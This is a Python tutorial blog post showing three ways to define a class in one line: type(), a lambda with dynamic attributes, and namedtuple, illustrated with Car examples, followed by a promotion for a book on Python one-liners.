File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/test/test_writers/test_odt.py", line 104, in process_test
settings_overrides=settings_overrides)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 393, in publish_string
enable_exit_status=enable_exit_status)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 638, in publish_programmatically
settings_spec, settings_overrides, config_section)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 139, in process_programmatic_settings
**defaults)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 126, in get_settings
usage, description, settings_spec, config_section, **defaults)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/core.py", line 113, in setup_option_parser
usage=usage, description=description)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 534, in __init__
config_settings = self.get_standard_config_settings()
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 593, in get_standard_config_settings
settings.update(self.get_config_file_settings(filename), self)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 599, in get_config_file_settings
parser.read(config_file, self)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 714, in read
self.validate_settings(filename, option_parser)
File "/builddir/build/BUILD/python3-python-docutils-0.7-3.fc15/docutils/frontend.py", line 757, in validate_settings
self.set(section, setting, new_value)
File "/usr/lib64/python3.2/configparser.py", line 1157, in set
self._validate_value_types(option=option, value=value)
File "/usr/lib64/python3.2/configparser.py", line 1146, in _validate_value_types
raise TypeError("option values must be strings")
TypeError: option values must be strings
I'll attach the complete build log with all the tracebacks.
----------------------------------------------------------------------
>Comment By: Toshio Kuratomi (abadger1999)
Date: 2011-04-04 12:11
I've tried this patch to workaround the configparser changes. It's... not
ideal because it simply ports to using RawConfigParser (which accepts
non-strings) rather than changing docutils to use string values everywhere.
This gets me to a new error in Elementtree which I'm trying to diagnose --
will open a new bug on that after we get something.
----------------------------------------------------------------------
Comment By: Georg Brandl (gbrandl)
Date: 2011-02-12 02:24
I had spoken with him and he wanted to add his feedback himself; the gist
of it was that he considers storing non-strings an abuse of the
configparser.
----------------------------------------------------------------------
Comment By: Toshio Kuratomi (abadger1999)
Date: 2011-02-11 13:50
Any word from the configparser maintainer? Seems like we've gotten late
enough in the py-3.2 cycle that we might have a de facto answer....
----------------------------------------------------------------------
Comment By: Georg Brandl (gbrandl)
Date: 2011-01-02 17:45
I'll forward this to the configparser maintainer, to clarify if this
incompatibility is acceptable for 3 | https://sourceforge.net/p/docutils/mailman/docutils-develop/?viewmonth=201104 | CC-MAIN-2016-50 | refinedweb | 3,392 | 53.27 |
What are people's experiences with any of the Git modules for Python? (I know of GitPython, PyGit, and Dulwich - feel free to mention others if you know of them.)
I am writing a program which will have to interact (add, delete, commit) with a Git repository, but have no experience with Git, so one of the things I'm looking for is ease of use/understanding with regards to Git.
The other things I'm primarily interested in are maturity and completeness of the library, a reasonable lack of bugs, continued development, and helpfulness of the documentation and developers.
If you think of something else I might want/need to know, please feel free to mention it.
I thought I would answer my own question, since I'm taking a different path than suggested in the answers. Nonetheless, thanks to those who answered.
First, a brief synopsis of my experiences with GitPython, PyGit, and Dulwich:
Also, StGit looks interesting, but I would need the functionality extracted into a separate module and do not want wait for that to happen right now.
In (much) less time than I spent trying to get the three modules above working, I managed to get git commands working via the subprocess module, e.g.
def gitAdd(fileName, repoDir): cmd = ['git', 'add', fileName] p = subprocess.Popen(cmd, cwd=repoDir) p.wait() gitAdd('exampleFile.txt', '/usr/local/example_git_repo_dir')
This isn't fully incorporated into my program yet, but I'm not anticipating a problem, except maybe speed (since I'll be processing hundreds or even thousands of files at times).
Maybe I just didn't have the patience to get things going with Dulwich or GitPython. That said, I'm hopeful the modules will get more development and be more useful soon.
While this question was asked a while ago and I don't know the state of the libraries at that point, it is worth mentioning for searchers that GitPython does a good job of abstracting the command line tools so that you don't need to use subprocess. There are some useful built in abstractions that you can use, but for everything else you can do things like:
import git repo = git.Repo( '/home/me/repodir' ) print repo.git.status() # checkout and track a remote branch print repo.git.checkout( 'origin/somebranch', b='somebranch' ) # add a file print repo.git.add( 'somefile' ) # commit print repo.git.commit( m='my commit message' ) # now we are one commit ahead print repo.git.status()
Everything else in GitPython just makes it easier to navigate. I'm fairly well satisfied with this library and appreciate that it is a wrapper on the underlying git tools.
UPDATE: I've switched to using the sh module for not just git but most commandline utilities I need in python. To replicate the above I would do this instead:
import sh git = sh.git.bake(_cwd='/home/me/repodir') print git.status() # checkout and track a remote branch print git.checkout('-b', 'somebranch') # add a file print git.add('somefile') # commit print git.commit(m='my commit message') # now we are one commit ahead print git.status() | https://pythonpedia.com/en/knowledge-base/1456269/python-git-module-experiences- | CC-MAIN-2020-34 | refinedweb | 525 | 64.1 |
I was going through a code where I encountered some problem and was able to crack this piece of code:
#include <iostream> #include <stdint.h> #include <unistd.h> #include <errno.h> #include <vector> #include <sys/types.h> using namespace std; class abc { public: abc(int x,int y) { cout << "x:" << x << endl; cout << "y:" << y << endl; } virtual ~abc() {} enum example { a = 1, b = 2, c = 3, d = 4 }; }; template<typename T> class xyz { public: void some_func(abc *a) { cout<<"some_func called"<<endl; } }; int main() {}
I want to call the function
some_func()
from
main(). How should I do that. Can somebody help me with this?? | http://www.howtobuildsoftware.com/index.php/how-do/bLd/c-templates-object-c-passing-objects-to-functions | CC-MAIN-2019-30 | refinedweb | 104 | 74.9 |
In-app Payments with mozPay
Subnav
Marketplace feature removal
The functionality described on this page no longer works — Firefox Marketplace has discontinued support for Android, Desktop, Tablets, and payments (and other related functionality). For more information, read the Future of Marketplace FAQ.
The navigator.mozPay API enables web pages to take payment for digital goods. This article explains how to use the navigator.mozPay API and Web Payment Provider services to process in-app payments.
Overview
Here is an overview of how you add in-app payments to your app and process a transaction:
- Log in to the Firefox Marketplace Developer Hub.
- Upload an app, set it up as paid/in-app, and generate an Application Key and an Application Secret.
- From your app, initiate a payment by signing a JWT request with your secret and calling
navigator.mozPay(...).
- This starts a payment flow in a new window
- The buyer logs in with their email address.
- The buyer enters their PIN.
- The buyer charges the purchase to their phone bill or credit card.
- Your app receives a JavaScript callback when the buyer closes the window.
- Your app server receives a signed POST request with a Mozilla transaction ID indicating that the purchase was completed.
- If the transaction succeeded, you receive money directly deposited to your bank account
The
navigator.mozPay API is currently only available on Firefox OS. You can test it with the Firefox OS Simulator.
Process an in-app payment: step by step
This section explains how set up an in-app payment for testing and production.
Obtain a payment key for testing
When you log into the Firefox Marketplace Developer Hub you can visit the In-App Payment Keys page to generate an Application Key and Application Secret for testing. This key will only allow you to simulate in-app payments but this is suitable for testing. You should try out some simulations before you submit your app for review to the Marketplace. Read on for instructions on how to simulate a payment.
Obtain a real payment key
When you submit your working app to the Firefox Marketplace Developer Hub you will be prompted to configure payments. Select the cost of your app (typically free in this case) then mark the option to accept in-app payments. After setting up your bank account details, visit the In-App Payments page to obtain an Application Key and Application Secret for making real payments.
Store the Application Secret securely on your app server in a private settings file or something like that.
Set up an application
Let's say you are building an adventure game web app and you want to offer a Magical Unicorn for purchase so that players can excel in the game. You want to charge $1.99 or €1.89 or whatever the user's preferred currency is. In the following sections you'll see how to set up a backend server and write frontend code to use
navigator.mozPay to sell products.
Set up your server to sign JWTs
A payment is initiated with a JSON Web Token (JWT) and it must be created server side, not client side. This is because the secret key used for signing should never be publicly accessible. Continuing with the example of selling a Magical Unicorn for an adventure game, create a URL on your server like
/sign-jwt. This should create a JSON object that defines the product name, the price point, etc. Consult the Web Payment API spec for complete documentation on the JWT format. Here is an example:
{ " } } } }
Here is an overview of each field:
In Python code (using PyJWT), you could sign and encode the request dictionary shown above like this:
import jwt signed_request = jwt.encode(request_dict, application_secret, algorithm='HS256')
This code signs a JWT using the application secret and uses the HMAC SHA 256 algorithm. Currently, this is the only supported algorithm. When encoded, it will look something like this:
eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.IntcImF1ZFwiOiBcIm1hcmtldHBsYWNlLm1vemlsbGEub3JnXCIsIFwiaXNzXCI6IFwiQVBQLTEyM1wiLCBcInJlcXVlc3RcIjoge1wiY3VycmVuY3lcIjogXCJVU0RcIiwgXCJwcmljZVwiOiBcIjAuOTlcIiwgXCJuYW1lXCI6IFwiVmlydHVhbCAzRCBHbGFzc2VzXCIsIFwicHJvZHVjdGRhdGFcIjogXCJBQkMxMjNfREVGNDU2X0dISV83ODkuWFlaXCIsIFwiZGVzY3JpcHRpb25cIjogXCJWaXJ0dWFsIDNEIEdsYXNzZXNcIn0sIFwiZXhwXCI6IFwiMjAxMi0wMy0yMVQxMTowOTo1Ni43NTMxNDFcIiwgXCJpYXRcIjogXCIyMDEyLTAzLTIxVDEwOjA5OjU2LjgxMDQyMFwiLCBcInR5cFwiOiBcIm1vemlsbGEvcGF5bWVudHMvcGF5L3YxXCJ9Ig.vl4E31_5H3t5H_mM8XA69DqypCqdACVKFy3kXz9EmTI
The encoded/signed JWT can now be used by your app in its client code.
Set up a purchase button
Now that you have a backend to produce a JWT for your product, here's an example of writing frontend code with
navigator.mozPay. You would make a button somewhere in your app that lets players purchase the product. For example:
<button id="purchase">Purchase Magical Unicorn</button>
When the purchase button is clicked, your app should sign a JSON Web Token (JWT) and call
navigator.mozPay. Here is an example using jQuery:
$('#purchase button').click(function() { // The purchase is now pending... $.post('/sign-jwt', {}) .done(function(signedJWT) { var request = navigator.mozPay([signedJWT]); request.onsuccess = function() { waitForPostback(); }; request.onerror = function() { console.log('navigator.mozPay() error: ' + this.error.name); } }) .fail(function() { console.error('Ajax post to /sign-jwt failed'); }); }); function waitForPostback() { // Poll your server until you receive a postback with a JWT. // If the JWT signature is valid then you can dispurse the Magical Unicorn // product to your customer. // For bonus points, use Web Sockets :) }
This code would make an Ajax request to a
/sign-jwt URL on your own server. That URL would sign a JSON blob with product/price info and return a JWT in plain text. The Ajax handler would pass that JWT into
navigator.mozPay and then wait until the Payment Provider POSTs a purchase confirmation to your server. If the signature on the posted JWT is valid you can deliver the virtual goods to your customer.
Processing postbacks on the server
Before delivering your product, you need to wait for a purchase confirmation from the Marketplace; this is called a postback. The
marketplace.firefox.com site sends a POST confirmation notice (a JWT) to the
request.postbackURL specified in the original payment request. The postbackURL must be the URL for a server listening on either port 80 or port 443.
The POST has a
Content-Type of
application/x-www-form-urlencoded and the JWT can be found in the
notice parameter. In your server framework you'll probably access this with something like request.POST['notice'].
This JWT notice contains all the payment request fields plus a transaction ID, and is signed with your application secret that was obtained from the Firefox Marketplace Developer Hub. You can fulfill the purchase when you receive a postback and validate the signature. If you get a JWT whose signature you cannot verify you should ignore it since it probably wasn't sent by the marketplace.
The Web Payment API spec explains what postbacks look like in detail. The postback contains the original request and adds a new response parameter that contains a Mozilla specific transaction ID. Here is an example:
{ "iss": "marketplace.firefox.com", "aud": APPLICATION_KEY, "typ": "mozilla/payments/pay/post", "price": {"amount": "0.99", "currency": "CAD"} } }
Description of the postback object:
Here are some important notes about the postback:
- The JWT is signed with your Application Secret
- Your postback/chargeback URLs must be located either on port 80 or port 443 of your web server. No other ports can be used. This is due to how Mozilla's firewall is configured.
Responding to postbacks
Your application must respond to the postback with a plain text HTTP response including just the transaction ID. For example:
HTTP/1.1 200 OK Content-Type: text/plain ABCD84294ec6-7352-4dc7-90fd-3d3dd36377e9
Processing chargebacks on the server
Marketplace will send you a chargeback notice (a POSTed JWT) if something goes wrong while processing the transaction, such as insufficient funds in the buyer's account. Chargebacks will be delivered to the app just like postbacks but they might arrive later on. The POST has a
Content-Type of
application/x-www-form-urlencoded and the JWT can be found in the
notice parameter. The chargeback must be the URL for a server listening on either port 80 or port 443.
Here is an example of what a decoded chargeback notice might look like:
{ "iss": "marketplace.firefox.com", "aud": APPLICATION_KEY, "typ": "mozilla/payments/pay/charge", "reason": "refund" } }
Description of the chargeback object:
NOTE: Refunds are not yet supported for in-app payments.
Your application must respond to the chargeback with a plain text HTTP response containing just the transaction ID. For example:
HTTP/1.1 200 OK Content-Type: text/plain ABCD84294ec6-7352-4dc7-90fd-3d3dd36377e9
Postback/chargeback errors
If an application server responds to the HTTP request with a non-successful status code then Mozilla's Web Payment Provider will retry the URL several times. If it still doesn't receive a successful response, the app developer will be notified and the app may be temporarily disabled. If the application server does not respond to the postback or chargeback with the transaction ID then it is handled like an error and will be retried, etc. If you are not seeing requests to your chargeback or postback URL's, make sure that your serve is listening on port 80 or 443. Mozilla's IAP server will not contact you otherwise.
Use HTTPS postback/chargeback URLs
When running your app in a production environment try to use secure HTTPS URLs if you have the means to do so. This will protect the postback data from being read by a third party when it transits from a Mozilla server to your app server. Using HTTPS is not mandatory to protect the integrity of the payment request, a JWT signature accomplishes that.
Warning: If you do not use secure HTTPS postback URLs, ensure your payment request does not contain personally identifiable information in case it is intercepted by a third party. For example, make sure your productData value does not reveal any sensitive user data. Mozilla never includes personally identifiable information in a payment request by default.
Postback/chargeback IPs
If you are correctly checking the JWT signature as decribed above then there is no need to whitelist IPs of the Firefox Marketplace servers that will send you postback/chargeback notices. However, if you wish to add an extra layer of protection (e.g. against key theft), the Marketplace will send you postback/chargeback notices from the following IP address(es). Any changes to these IP addresses will be announced on the dev-marketplace mailing list.
63.245.216.100
Simulating payments
The intro mentioned how you can obtain a special application key and application secret from the Firefox Marketplace Developer Hub to simulate in-app payments while you are developing and testing your app. Use this secret to sign a custom JWT that looks like this:
{ ": "", "simulate": { "result": "postback" } } }
The additional
request.simulate attribute tells the payment provider to simulate some result without charging any money. The user interface will not ask for a login or a PIN number either. You can use this while developing your app to make sure your buy button is hooked up correctly to
navigator.mozPay and your server postback and chargeback URLs are functioning correctly.
Here is an example that will simulate a successful purchase and send a signed notification to your postback URL:
{ ... "request": { ... "simulate": { "result": "postback" } } }
Here is how to simulate a chargeback refund:
{ ... "request": { ... "simulate": { "result": "chargeback", "reason": "refund" } } }
A JWT notice is posted to your handler just like for a real purchase except you'll receive a randomly generated transactionID. It is okay to use non-HTTPS URLs for simulations.
When you simulate a chargeback, keep in mind that the mozPay
onsuccess() callback will be invoked since a chargeback is not an operational error.
Note: Simulated payment JWTs should not be used in production because your customers would be able to obtain free products.
Debugging errors
If you don't use the in-app payment API correctly, the payment screen will show an error that aims to help the user figure out what to do. The payment screen will also include an error code which aims to help you as the developer figure out what to do. You can use Mozilla's Error Legend API to decipher error codes in your own language. For example, the error code
INVALID_JWT means the JWT signature is invalid or the JWT is malformed.
Protect the application secret
Warning: Ensure that no one else can read your Application Secret. Never expose it to the client.
Revoking a compromised application secret
In the rare chance that your application secret leaks out or becomes compromised, you need to revoke it as soon as possible. Here's how:
- Log in to the Firefox Marketplace.
- Navigate to My Submissions and locate your app.
- Navigate to the Manage In-App Payments page, which is the same place where you generated your credentials.
- Click the Reset Credentials button.
After resetting your credentials, no one will be able to process payments with the old credentials. You will see a new application key and application secret that you can begin using immediately to continue processing payments in your app.
If you need to report any other security issues, please file a bug in the Payments/Refunds component.
Code libraries
Here are libraries specific to Mozilla's
navigator.mozPay:
To find a secure, up to date JSON Web Token (JWT) library for your favorite language, see jwt.io.
Sample code
- Here is the source to Web Fighter, a game that implements in-app payments in NodeJS. You can install it from the Marketplace here.
- Here is a diagnostics and testing app that shows how to sign JWT requests and write postback and chargeback verifier code in Python: In-app Payment Tester
Getting help
- You can discuss in-app payment related issues on the dev-webapps mailing list or in the #payments channel on irc.mozilla.org.
- You can file a Marketplace bug in the Payments/Refunds component if you find a bug | https://developer.mozilla.org/en-US/docs/Archive/Marketplace/Monetization/In-app_payments_section/mozPay_iap | CC-MAIN-2021-17 | refinedweb | 2,284 | 54.73 |
Classes and Objects in C++
Get FREE domain for 1st year and build your brand new site
Reading time: 45 minutes | Coding time: 5 minutes
The main purpose of C++ programming is to add object orientation to the C programming language and classes are the central feature of C++ that supports object-oriented programming and are often called
user-defined types.
A class is a mechanism for creating user-defined data types. It is similar to the C language structure data type. In C, a structure is composed of a set of data members. In C++, a class type is like a C structure, except that a class is composed of a set of data members and a set of operations that can be performed on the class.
In other words, these are the building block of C++ that leads to Object Oriented programming.It is a user defined data type, which holds its own data members and member functions, which can be accessed and used by creating an instance of that class. A class is like a
blueprint for an object.
A class is used to specify the form of an object and it combines data representation and methods for manipulating that data into one neat package. The data and functions within a class are called members of the class.That means, the variables inside class definition are called as data members and the functions are called member functions.
All in all, it can also be said that a class is a way to bind the data and its associated functions together in a single unit. This process is called Encapsulation.
Example-1:.
That means, a Class is just a blue print, which declares and defines characteristics and behavior, namely data members and member functions respectively. And all objects of this class will share these characteristics and behavior.
Example-2:.
Here, the data member will be speed limit, mileage etc and member functions can be apply brakes, increase speed etc.
C++ Class
When we define a class, −
class Student { public: int id; //field or data member float salary; //field or data member String name; //field or data member };
In the above example, the keyword public determines the access attributes of the members of the class that follows it. A public member can be accessed from outside the class anywhere within the scope of the class object. We can also specify the members of a class as private or protected.
C++ Objects
An Object is an
instance of a Class. When a class is defined, no memory is allocated but when it is instantiated (i.e. an object is created) memory is allocated.
Objects are instances of class, which holds the data variables declared in class and the member functions work on these class objects.
Each object has different data variables. Objects are initialised using special class functions called
Constructors.
And whenever the object is out of its scope, another special class member function called
Destructor is called, to release the memory reserved by the object. C++ doesn't have Automatic Garbage Collector like in JAVA, in C++ Destructor performs this task.
In C++, object is a group of similar objects. It is a template from which objects are created. It can have fields, methods, constructors etc.
We declare objects of a class with exactly the same sort of declaration that we declare variables of basic types. Following statements declare two objects of any class Box −
Box Box1; // Declare Box1 of type Box Box Box2; // Declare Box2 of type Box
Both of the objects Box1 and Box2 will have their own copy of data members.
Syntax :
ClassName ObjectName;
Accessing data members and member functions :
The data members and member functions of class can be accessed using the
dot(‘.’) operator with the object.
1. Accessing data members :-
Example-1 : if the name of object is obj and you want to access the member function with the name printName() then you will have to write obj.printName().
Lets now, understand through code :-
Example-2:
#; }
Output :
The output of above example-2 is as follows :
Volume of Box1 : 210 Volume of Box2 : 1560
NOTE :- Private and Protected members can not be accessed directly using direct member access operator (.).
Example-3: Initialize and Display data through method
# include <iostream> using namespace std; class Employee { public: int id; //data member (also instance variable) string name; //data member(also instance variable) float salary; void insert(int i, string n, float s) { id = i; name = n; salary = s; } void display() { cout << id << " " << name << " " << salary << endl; } }; int main(void) { Employee e1; //creating an object of Employee Employee e2; //creating an object of Employee e1.insert(201, "Sonoo",990000); e2.insert(202, "Nakul", 29000); e1.display(); e2.display(); return 0; }
Output :
201 Sonoo 990000 202 Nakul 29000
2..
There are 2 ways to define a member function:
- Inside class definition
- Outside class definition
Defining a member function within the class definition declares the function inline, even if we do not use the inline specifier.
If the member function is defined inside the class definition it can be defined directly, but if its defined outside the class, then we have to use the scope resolution
:: operator along with class name alng with function name.
1. Inside class definition :
If we define the function inside class then we don't not need to declare it first, we can directly define the function.
Example -
#include<iostream> using namespace std; class Cube { public: int side=10; void getVolume() { cout<< side*side*side; //prints volume of cube } }; int main() { Cube obj; obj.getVolume() return 0; }
Output :-
1000
2. Outside class definition :
But if we plan to define the member function outside the class definition then we must declare the function inside class definition and then define it outside.
Example -
#include<iostream> using namespace std; class Cube { public: int side=10; int getVolume(); } // member function defined outside class definition void Cube :: getVolume() { cout<< side*side*side; } int main() { Cube obj; obj.getVolume() return 0; }
Output :-
1000
NOTE :-The main function for both the function definition will be same. Inside main() we will create object of class, and will call the member function using dot . operator.
Calling Class Member Function in C++
#; }
Output :-
Volume of Box1 : 210 Volume of Box2 : 1560
Note:-. Declaring a
friend functionis a way to give private access to a non-member function.
Types of Member Functions :-
- Simple functions
- Static functions
- Const functions
- Inline functions
- Friend functions
1. Simple Member functions :-
These are the basic member function, which dont have any special keyword like static etc as prefix. All the general member functions, which are of below given form, are termed as simple and basic member functions.
Syntax :
return_type functionName(parameter_list) { function body; }
2. Static Member functions :-.
These functions cannot access ordinary data members and member functions, but only
static data members and static member functions can be called inside them.
It doesn't have any
"this" keyword which is the reason it cannot access ordinary members
It can be called using the object and the direct member access
. operator. But, its more typical to call a static member function by itself, using class name and scope resolution
:: operator.
example :-
class X { public: static void f() { // statement } }; int main() { X::f(); // calling member function directly with class name }
3. Const Member functions :-
Const keyword makes variables constant, that means once defined, there values can't be changed.When used with member function, such member functions can never modify the object or its related data members.
Syntax :-
void fun() const { // statement }
Example -
#include <iost }
4. Inline functions :-
All the member functions defined inside the class definition are by default declared as Inline.++; }
Example -
#include <iostream> inline int Add(int x,int y) { return x+y; } void main() { cout<<"\n\tThe Sum is : " << Add(10,20); cout<<"\n\tThe Sum is : " << Add(45,83); cout<<"\n\tThe Sum is : " << Add(27,48); }
Output :
The Sum is : 30 The Sum is : 98 The Sum is : 75
Important Points About Inline Functions :-
- We must keep inline functions small, small inline functions have better efficiency.
- Inline functions do increase efficiency, but we should not make all the functions inline. Because if we make large functions inline, it may lead to code bloat, and might affect the speed too.
- Hence, it is adviced to define large functions outside the class definition using scope resolution :: operator, because if we define such functions inside class definition, then they become inline automatically.
- Inline functions are kept in the Symbol Table by the compiler, and all the call for such functions is taken care at compile time.
5. Friend functions :-
Friend functions are actually not a class member function. Friend functions are made to give private access to non-class functions. We can declare a global function as friend, or a member function of other class as friend.
When we make a class as friend, all its member functions automatically become friend functions.
Friend Functions is a reason, why C++ is not called as a pure Object Oriented language. Because it violates the concept of Encapsulation.
Syntax:-
class class_name { friend data_type function_name(argument/s); };-1:
Example when the function is friendly to two classes :-
#include <iostream> class B; // forward declarartion. class A { int x; public: void setdata(int i) { x=i; } friend void min(A,B); // friend function. }; class B { int y; public: void setdata(int i) { y=i; } friend void min(A,B); // friend function }; void min(A a,B b) { if(a.x <= b.y) std::cout << a.x<< std::endl; else std::cout<< b.y<< std::endl; } int main() { A a; B b; a.setdata(10); b.setdata(20); min(a,b); return 0; }
Output :-
10 | https://iq.opengenus.org/classes-objects-cpp/ | CC-MAIN-2021-43 | refinedweb | 1,617 | 60.95 |
Miklos Szeredi <miklos@szeredi.hu> writes:> On Sat, Feb 15, 2014 at 01:37:26PM -0800, Eric W. Biederman wrote:>> >> v2: Always drop the lock when exiting early.>> v3: Make detach_mounts robust about freeing several>> mounts on the same mountpoint at one time, and remove>> the unneeded mnt_list list test.>> v4: Document the purpose of detach_mounts and why new_mountpoint is>> safe to call.>> >> Signed-off-by: Eric W. Biederman <ebiederman@twitter.com>>> --->> fs/mount.h | 2 ++>> fs/namespace.c | 39 +++++++++++++++++++++++++++++++++++++++>> 2 files changed, 41 insertions(+), 0 deletions(-)>> >> diff --git a/fs/mount.h b/fs/mount.h>> index 50a72d46e7a6..2b470f34e665 100644>> --- a/fs/mount.h>> +++ b/fs/mount.h>> @@ -84,6 +84,8 @@ extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *);>> >> extern bool legitimize_mnt(struct vfsmount *, unsigned);>> >> +extern void detach_mounts(struct dentry *dentry);>> +>> static inline void get_mnt_ns(struct mnt_namespace *ns)>> {>> atomic_inc(&ns->count);>> diff --git a/fs/namespace.c b/fs/namespace.c>> index 33db9e95bd5c..7abbf722ce18 100644>> --- a/fs/namespace.c>> +++ b/fs/namespace.c>> @@ -1359,6 +1359,45 @@ static int do_umount(struct mount *mnt, int flags)>> return retval;>> }>> >> +/*>> + * detach_mounts - lazily unmount all mounts on the specified dentry>> + *>> + * During unlink, rmdir, and d_drop it is possible to loose the path>> + * to an existing mountpoint, and wind up leaking the mount.>> + * detach_mounts allows lazily unmounting those mounts instead of>> + * leaking them.>> + * >> + * The caller may hold dentry->d_inode->i_mutex.>> + */>> +void detach_mounts(struct dentry *dentry)>> +{>> + struct mountpoint *mp;>> + struct mount *mnt;>> +>> + namespace_lock();>> + if (!d_mountpoint(dentry))>> + goto out_unlock;>> +>> + /* >> + * The namespace lock and d_mountpoint being set guarantees>> + * that new_mountpoint will just be a lookup of the existing>> + * mountpoint structure.>> + */>> + mp = new_mountpoint(dentry);>> Howabout a get_mountpoint(dentry) helper, that returns NULL if it turns out to> be not a mountpoint? And, as an added bonus, you can drop the comment above as> well.I hate to admit it but that is a nice change. Especially as it allowsremoving the d_mounpoint check inside of namespace_lock. I still need acheak d_mounpoint check outside of namespace lock but inside it can go.The first time I looked at doing that I missed something and the changelooked too awkward to be worth implementing :(Eric | https://lkml.org/lkml/2014/2/24/761 | CC-MAIN-2020-16 | refinedweb | 354 | 58.89 |
Created on 2008-07-18 12:52 by gpolo, last changed 2018-05-29 14:18 by mkiever.
Follows a patch that adds support for the new data option supported
event generate. It allows virtual events to pass a tcl object.
This patch is only intended to correctly support tcl objects, trying to
pass other objects (like a dict) will result in None being returned. If
you want to correctly pass and receive a dict, make it an attribute of
the tcl object being passed.
E.g.:
import Tkinter
def handle_it(event):
print event.data.something
root = Tkinter.Tk()
root.something = {1: 2}
root.after(1, lambda: root.event_generate('<<Test>>', data=root))
root.bind('<<Test>>', handle_it)
root.mainloop()
Actually, it could be the "detail" field too according to
And this field may not exist, so I'm checking for that now.
New patch added.
Hello,
I read the proposed patch "event_generate__data2.diff" and the Tcl/Tk manual
* Could you please also add a field "e.user_data" ? This would simply be a copy of 'd' :
---
e.detail = d
e.user_data = d
---
My reasoning is that the Tcl/Tk manual mentions the two names "detail" and "user_data". However, "user_data" may often be preferred because it has a clear meaning, whereas "detail" is quite vague.
* I did not understand why you try to get a widget reference from the "%d" field. Is it supposed to contain a widget name at some point ? According to the manual (and if I understood it well), it should never.
Best regards,
O.C.
According to the Tcl/Tk docs the 'data' field is a string (i.e., for any user data) and the 'detail' field contains some internal data (so shouldn't be messed with); see
Anyway, I hope you add a data field for user created virtual events.
I don't agree with this comment.
1) The 'detail' field also contains a string, one of the following: "NotifyAncestor", "NotifyNonlinearVirtual",...
2) When an event is received, the 'detail' and 'user_data' fields are de facto mixed up. Indeed, the "%d" field contains "the detail or user_data field from the event".
This information comes form the documentation I cited, :
* The "%d" field contains "the detail or user_data field from the event".
* They are both strings:
* "the %d is replaced by a string identifying the detail"
* "For virtual events, the string will be whatever value is stored in the user_data field when the event was created (typically with event generate), or the empty string if the field is NULL"
From the document cited in msg165234 (), my understanding is:
* For virtual events, the "data" string parameter given to "event generate" will be stored in the "user_data field" for the event. This string will then be available from the event through the "%d" substitution.
* For events "Enter", "Leave", "FocusIn" and "FocusOut", the "detail" field will store a string among "NotifyAncestor", etc. This string will then be available from the event through the "%d" substitution.
So, from the point of view of the guy who receives the event, the "%d" field can EITHER be a "detail" string like "NotifyAncestor" if event was "Enter"/"Leave"/"FocusIn"/"FocusOut" OR a "user_data" string in the case of a virtual event. It seems sensible that the Python interface provides both names. As a consequence, I think the patch should read:
+ # value passed to the data option is not a widget, take it
+ # as the detail field
+ e.data = None
+ e.detail = d
+ e.user_data = d
I hope I understood the doc correctly.
I have a patched Python 3.5.3 running mostly following
the comments by O.C. If no one else is active on this
I can try to prepare something for submission.
Fill free to create a pull request. It may need tests and documentation though.
So I pulled, but it seems the CLA is stuck somewhere. Investigating... | https://bugs.python.org/issue3405 | CC-MAIN-2019-30 | refinedweb | 643 | 66.64 |
Do you hate those lengthy class definitions with
__init__ and too many whitespaces and newlines? Python One-Liners to the rescue! Luckily, you can create classes in a single line—and it can even be Pythonic to do so! Sounds too good to be true? Let’s dive right into it!
Problem: How to create a Python class in a single line of code?
Example: Say, you want to create a class
Car with two attributes
speed and
color. Here would be the lengthy definition:
class Car: def __init__(self, speed, color): self.speed = speed self.color = color porsche = Car(200, 'red') tesla = Car(220, 'silver') print(porsche.color) # red print(tesla.color) # silver
How do you do this in a single line of code?
Let’s have an overview first in our interactive Python shell:
Exercise: Create a third attribute
seats and initialize it for both the Tesla and the Porsche car!
Method 1: type()
The
type(name, bases, dict) function creates and returns a new object. It takes three arguments that allow you to customize the object:
name: this is the class name of the new object. It becomes the
nameattribute, so that you can use
object.nameto access the argument value.
bases: this is a tuple of one or more tuple values that defines the base classes. You can access the content via the
object.basesattribute of the newly-created object.
dict: this is the namespace with class attributes and methods definitions. You can create custom attributes and methods here. In case, you want to access the values later, you can use the
object.__dict__attribute on the newly-created object.
Here’s how you can use the
type() function to create a new
Car object
porsche:
# Method 1: type() # One-Liner porsche = type('Car', (object,), {'speed': 200, 'color': 'red'}) # Result print(porsche.color) # red
If you need to learn more about the
type() function, check out our related article.
Related Article: How to Create Inline Objects With Properties? [Python One-Liner]
The
type() function is little-known but very effective when it comes to creating object of various types. The only disadvantage is that you cannot reuse it—for example, to create another object. You’d need to use the same argument list to create a second object of the same type, which may be a bit tedious in some cases.
Method 2: Lambda Object + Dynamic Attributes
The
lambda keyword is usually used to create a new and anonymous function. However, in Python, everything is an object—even functions. Thus, you can create a function with return value
None and use it as a
Car object.
Then, you add two dynamic attributes
speed and
color to the newly created object. You can one-linerize everything by using the semicolon syntax to cram multiple lines of code into a single line. Here’s how the result looks like:
# Method 2: lambda + dynamic attributes # One-Liner tesla = lambda: None; tesla.speed = 200; tesla.color = 'silver' # Result print(tesla.color) # silver
This method is a bit unnatural—and I’d consider it the least-Pythonic among the ones discussed in this article. However, the next one is quite Pythonic!
Method 3: Named Tuples
There also is an exciting data type in the collections module: named tuples.
from collections import namedtuple # One-Liner tesla = namedtuple('Car', ['speed', 'color'])(200, 'silver') # Result print(tesla.speed, tesla.color) # 200 silver
The namedtuple object definition consists of two parts:
- The first part of the expression
namedtuple('Car', ['speed', 'color'])creates a new object with two attributes given in the list.
- The second part of the expression associates the string
'value'to the tuple attribute
'property'.
This final method is efficient, clean, and concise—and it solves the problem to create a Python class in a single line of code because you can reuse your namedtuple “class” to create multiple instances if you want!!! | https://blog.finxter.com/python-one-line-class/ | CC-MAIN-2020-50 | refinedweb | 649 | 66.44 |
